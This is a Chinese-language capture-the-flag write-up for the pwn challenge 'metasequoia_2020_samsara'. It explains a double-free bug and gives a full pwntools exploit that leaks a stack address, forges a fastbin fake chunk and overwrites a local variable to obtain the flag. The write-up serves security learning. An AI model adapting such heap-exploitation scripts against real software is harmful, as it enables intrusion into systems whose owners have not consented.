metasequoia_2020_samsara

保护全开，就不放了

程序挺简单的，菜单直接放出来了，存在double free漏洞，只需要让v8=0xdeadbeef就能拿到flag

先double free,然后用case4打印出v7的地址，在栈上v8的地址等于v7+0x8,double free改地址的时候改到v7-0x8,然后v7的值得是0x20，构造fakechunk，然后malloc的时候在v7-0x8+0x10的地方写上0xdeadbeef

开始的时候得多申请一个堆堆3，其他师傅说防止free 掉的两个chunk和top chunk合并，脚本跑的话没逝，但以后还是得注意

exp

from pwn import*
from LibcSearcher import *
#p=remote("node4.buuoj.cn",28766)
p=process("./metasequoia_2020_samsara")
context.log_level="debug"

libc=ELF('./libc-2.23.so')

def add():
    p.sendlineafter('choice > ','1')

def free(index):
    p.sendlineafter('choice > ','2')
    p.sendlineafter('Index',str(index))

def full(index,content):
    p.sendlineafter('choice > ','3')
    p.sendlineafter('Index',str(index))
    p.sendlineafter('Ingredient:',content)

def show():
    p.sendlineafter('choice > ','4')
  
def move(content):
    p.sendlineafter('choice > ','5')
    p.sendlineafter('Which kingdom?',content)

add() #0
add() #1
add() #2
free(0)
free(1)
free(0)
show()

p.recvuntil('Your lair is at: ')
addr=int(p.recv(14),16)
#addr = int(p.recvuntil('\n', drop=True), 16)
print('addr=>'+hex(addr))
move(str(0x20))
gdb.attach(p)
pause()
#sleep(1)


v8=addr-0x8
add() #3
full(3,str(v8))
add() #4
add() #5

add() #6

full(6,str(0xdeadbeef))

p.sendlineafter('choice > ','6')

p.interactive()